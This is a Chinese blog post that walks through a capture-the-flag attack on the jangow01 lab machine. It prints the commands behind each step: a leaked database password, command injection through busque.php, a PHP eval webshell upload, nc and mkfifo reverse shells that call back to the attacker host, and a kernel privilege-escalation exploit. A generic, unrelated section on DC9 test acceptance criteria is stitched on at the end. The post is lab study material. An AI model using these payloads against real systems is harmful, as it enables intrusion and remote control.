jangow01靶机渗透记录

主机:192.168.10.106
靶机:192.168.10.107

nmap -p- 192.168.10.107

21/tcp open  ftp                                                                                                                                                                                                   
80/tcp open  http

nmap -sS -sV -A -n 192.168.10.107

21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18

dirsearch -u http://192.168.10.107/site/

dirsearch -u http://192.168.10.107

#访问备份文件,发现数据库连接源码,得到用户jangow01的密码
http://192.168.10.107/.backup

$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);

#访问提供的木马接口查看源码。
http://192.168.10.107/site/busque.php?buscar=cat busque.php

<?php system($_GET['buscar']); ?>

#上传一句话木马,方便蚁剑连接。
http://192.168.10.107/site/busque.php?buscar=echo '<?php @eval($_POST["a"]);' > hack.php

#蚁剑连接成功
http://192.168.10.107/site/hack.php
#因为靶机开启防火墙,只有443端口开放,使用nc获取shell
nc -lvvp 443
#依然禁止了-e参数
nc -e /bin/bash 192.168.10.106 443
#主机获取shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.106 433 >/tmp/f
#开启交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
#查看靶机信息
uname -a #Linux jangow01 4.4.0-31-generic
#得到靶机系统为ubuntu 16.04
lsb_release -a

Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial

#查询可用漏洞
searchsploit ubuntu 4.4.0-31

searchsploit ubuntu 16.04

#获取提权程序源码
searchsploit -m 45010.c

#上传蚁剑编译提权
gcc 45010.c -o exp

#提权成功,通关
cat proof.txt                                                                                                                                                                                                      
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&                                                                                                                                         
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@                                                                                                                                         
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@                                                                                                                                         
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*   ./@@*   &@@                                                                                                                                         
                       @  @@@@@* (@@@@@@@@@#/.               .*@.  .#&.   &@@@&&                                                                                                                                   
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&                                                                                                                                   
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&                                                                                                                                   
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@                                                                                                                                  
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @                                                                                                                                  
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@                                                                                                                                 
                      @@/  *@@@@@@@/           @@@@@@@@@@@#                      @@                                                                                                                                
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@                                                                                                                                
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@                                                                                                                                
                       @&   .@@@@@@@@.         , @@@@@@@ *            .@@@*(    .@                                                                                                                                 
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@                                                                                                                                 
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@                                                                                                                                  
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@                                                                                                                                   
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&                                                                                                                                   
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&                                                                                                                                   
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&                                                                                                                                   
                       @  @@@@@@@@&               JANGOW               &@@@                                                                                                                                        
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&                                                                                                                                         
                                     &&&@@@@&%       &/    (&&@@@&&&                                                                                                                                               
                                       (((((((((((((((((((((((((((((





da39a3ee5e6b4b0d3255bfef95601890afd80709
### DC9靶机渗透测试验收标准与记录模板 对于DC9靶机渗透测试,验收标准通常围绕几个核心方面展开。这些方面包括但不限于漏洞发现的有效性、攻击路径验证以及安全建议的质量[^1]。 #### 漏洞发现有效性 有效的漏洞发现不仅限于识别已知的安全缺陷,还应涉及挖掘潜在未知风险的能力。这要求团队具备深入理解目标系统的架构和技术栈的知识,并能利用这一知识来探索可能存在的弱点[^2]。 #### 攻击路径验证 成功的渗透测试应当能够清晰展示从初始访问到最终控制的关键步骤。每一个假设性的入侵路线都需经过实际操作检验,确保其可行性并评估影响范围。此过程有助于客户直观了解自身网络环境下的真实威胁状况[^3]。 #### 安全建议质量 基于所发现问题提出的改进建议至关重要。高质量的安全措施不仅要针对性强,易于实施;更重要的是要考虑到业务连续性和成本效益等因素,在保障信息安全的同时不影响正常运营活动[^4]。 ```python # Python伪代码表示如何生成一份简单的报告结构 class ReportGenerator: def __init__(self, vulnerabilities_found, attack_paths_verified, security_advice_given): self.vulnerabilities_found = vulnerabilities_found self.attack_paths_verified = attack_paths_verified self.security_advice_given = security_advice_given def generate_report(self): report_content = { "Vulnerability Discovery": self.vulnerabilities_found, "Attack Path Verification": self.attack_paths_verified, "Security Advice Quality": self.security_advice_given } return report_content ``` 为了便于后续审查和改进工作,创建详细的文档化记录同样不可或缺。这类文件应该包含完整的测试计划描述、执行过程中遇到的具体情况说明及其解决方案概述等内容[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值